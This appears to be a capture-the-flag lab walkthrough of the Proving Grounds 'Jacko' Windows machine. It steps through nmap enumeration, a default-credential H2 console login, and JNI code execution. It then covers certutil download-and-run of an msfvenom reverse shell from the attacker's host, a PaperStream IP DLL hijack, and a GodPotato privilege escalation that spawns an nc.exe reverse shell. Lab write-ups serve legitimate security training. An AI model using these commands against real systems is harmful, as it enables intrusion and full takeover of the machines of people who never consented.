In this walk through, we will be going through the Jacko room from Proving Grounds. This room is rated as Intermediate on the platform and it consist of exploitation of running H2 Database instance via JNI Code Execution. For privilege escalation, we have two routes, either exploit PaperStream IP particular version or use Potato Exploits to get root. So, let’s get started without any delay.
Table of Contents
Machine Info:
Title | Jacko |
IPaddress | 192.168.229.66 |
Difficulty | Intermediate |
OS | Windows |
Description | Jacko is an Intermediate level Windows machine which is vulnerable to JNI Code Execution in running H2 Database instance. The privilege escalation has two routes, either exploit PaperStream IP particular version or use Potato Exploits to get root. |
Enumeration:
- I started off with a regular aggressive nmap and full TCP port scan. Found multiple ports opened on the target but the interesting one includes – 80 (HTTP), 139,445 (SMB), 8082 (HTTP).
$ sudo nmap -A 192.168.229.66 [sudo] password for wh1terose: Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-12 19:11 IST Nmap scan report for 192.168.229.66 Host is up (0.17s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 53/tcp filtered domain 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: H2 Database Engine (redirect) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 8082/tcp open http H2 database http console |_http-title: H2 Console No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=2/12%OT=80%CT=1%CU=43781%PV=Y%DS=4%DC=T%G=Y%TM=65CA206 OS:6%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=108%TS=U)OPS(O1=M54ENW8NNS% OS:O2=M54ENW8NNS%O3=M54ENW8%O4=M54ENW8NNS%O5=M54ENW8NNS%O6=M54ENNS)WIN(W1=F OS:FFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M OS:54ENW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T OS:4(R=N)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y OS:%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=5378%RUD=G)IE(R=N) Network Distance: 4 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2024-02-12T13:42:48 |_ start_date: N/A TRACEROUTE (using port 5900/tcp) HOP RTT ADDRESS 1 169.79 ms 192.168.45.1 2 169.76 ms 192.168.45.254 3 170.60 ms 192.168.251.1 4 170.59 ms 192.168.229.66 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 66.07 seconds
sudo nmap -sS -p- -T5 192.168.229.66
- Enumerated the web application on port 80 reveals a H2 Database Engine welcome page.
- Next, accessed the web server running on port 8082 reveals a login panel for the H2 Database Engine.
- I tried the blank password on default username and it logs me in.
- We are now prompted with a SQL statement input field. I used the below SQL statement to test if we can read the contents of the /etc/hosts file in Windows and it worked.
SELECT FILE_READ('C:/WINDOWS/System32/drivers/etc/hosts',NULL);
Initial Access:
- I looked online for any known exploits related to the running H2 Database version and found a JNI Code execution exploit. I used the commands listed in the below exploit and got a successful command execution on the target.
Exploit: https://www.exploit-db.com/exploits/49384
- Next to leverage the code execution into a full-blown shell. We first have to create a reverse shell binary using msfvenom.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.166 LPORT=8082 -f exe > revshell.exe
- Now, we will download the payload on to the target using Certutil.
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval"; CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil.exe -urlcache -f http://192.168.45.166:8000/revshell.exe c:/windows/temp/revshell.exe").getInputStream()).useDelimiter("\\Z").next()');
- At last, execute the payload using the below command. This will grant us a reverse shell back at our netcat listener.
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval"; CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c C:/Windows/Temp/revshell.exe").getInputStream()).useDelimiter("\\Z").next()');
- Captured the local flag on user Tony’s Desktop.
- The shell is a little clumsy. Stabilize it using the below powershell one liner.
set PATH=%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\system32\windowspowershell\v1.0\;
Privilege Escalation:
- Further, i looked into the installed application on the target. Found an interesting one – PageStream IP.
dir C:\Program Files (x86)
- I looked inside the application folder and peeked into readmeenu.rtf file that gives me the version of the PaperStreamIP running.
cd TWAIN type readmeenu.rtf
PaperStream IP driver 1.42
- I looked online for any known exploit and found a local privilege escalation exploit related to that. I performed the setup as required by the exploit. Downloaded the DLL to the target and executed the exploit however it didn’t grant me shell. Strange!
Exploit: https://www.exploit-db.com/exploits/49382
msfvenom -p windows/x64/shell_reverse_tcp -f dll -o UninOldIS.dll LHOST=192.168.45.152 LPORT=445
certutil.exe -urlcache -f http://192.168.45.152:8000/UninOldIS.dll C:\Windows\Temp\UninOldIS.dll certutil.exe -urlcache -f http://192.168.45.152:8000/49382.ps1 c:/Users/tony/Desktop/49382.ps1
- As per my previous enumeration, i knew that the current user has SEImpersonate Privilege set which makes it a contender for Potato Exploits. I used below God Potato Exploit on it.
God potato Exploit – https://github.com/BeichenDream/GodPotato/releases
- Downloaded the exploit on to the target and executed it with netcat to give me a reverse shell at my listener on port 4444.
certutil.exe -urlcache -f http://192.168.45.152:8000/GodPotato-NET4.exe c:/Users/tony/Desktop/Godpotato.exe certutil.exe -urlcache -f http://192.168.45.152:8000/nc.exe c:/Users/tony/Desktop/nc.exe
Godpotato.exe -cmd "nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.152 4444"
- Got the connection back as Administrator. Finally, captured the root flag and marked the machine as complete.
Also Read: PG – InsanityHosting
Conclusion:
So that was “Jacko” for you. We started off with a regular nmap scan and found multiple ports opened on the target but the interesting one includes – 80 (HTTP), 139,445 (SMB), 8082 (HTTP). Enumerated the web server running on port 8082 which reveals a login panel for the H2 Database Engine. Tried the blank password on default username and got logged in. Looked online for any known exploits related to the running H2 Database version and found a JNI Code execution exploit. Used the same to get initial access on the target. For privilege escalation, we had two routes, either exploit PaperStream IP particular version or use Potato Exploits to get root. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.